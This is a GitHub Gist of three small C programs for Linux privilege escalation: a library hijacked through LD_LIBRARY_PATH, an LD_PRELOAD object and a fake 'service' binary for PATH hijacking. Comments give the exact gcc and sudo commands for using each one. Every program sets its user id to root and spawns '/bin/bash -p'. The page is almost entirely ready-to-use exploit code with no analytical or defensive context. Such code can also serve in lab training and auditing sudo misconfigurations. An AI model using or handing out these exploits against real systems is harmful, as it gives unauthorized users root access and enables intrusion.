Last active
April 9, 2022 17:08
-
-
Save wesleyit/88f0935d57977ecea161a2c9f09ea8ab to your computer and use it in GitHub Desktop.
A Hijack module to cheat LD_stuff
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Compile with gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c | |
| Use with sudo LD_LIBRARY_PATH=/tmp apache2 | |
| When compiling, find any dependency of target binary and compile with the same name | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| static void hijack() __attribute__((constructor)); | |
| void hijack() { | |
| unsetenv("LD_LIBRARY_PATH"); | |
| setresuid(0,0,0); | |
| system("/bin/bash -p"); | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Compile with gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c | |
| Use with sudo LD_PRELOAD=/tmp/preload.so program-name-here | |
| */ | |
| #include <stdio.h> | |
| #include <sys/types.h> | |
| #include <stdlib.h> | |
| void _init() { | |
| unsetenv("LD_PRELOAD"); | |
| setresuid(0,0,0); | |
| system("/bin/bash -p"); | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A simple service which can replace a service command being called without full path | |
| // Compile with gcc -o service /home/user/tools/suid/service.c | |
| int main() { | |
| setuid(0); | |
| system("/bin/bash -p"); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment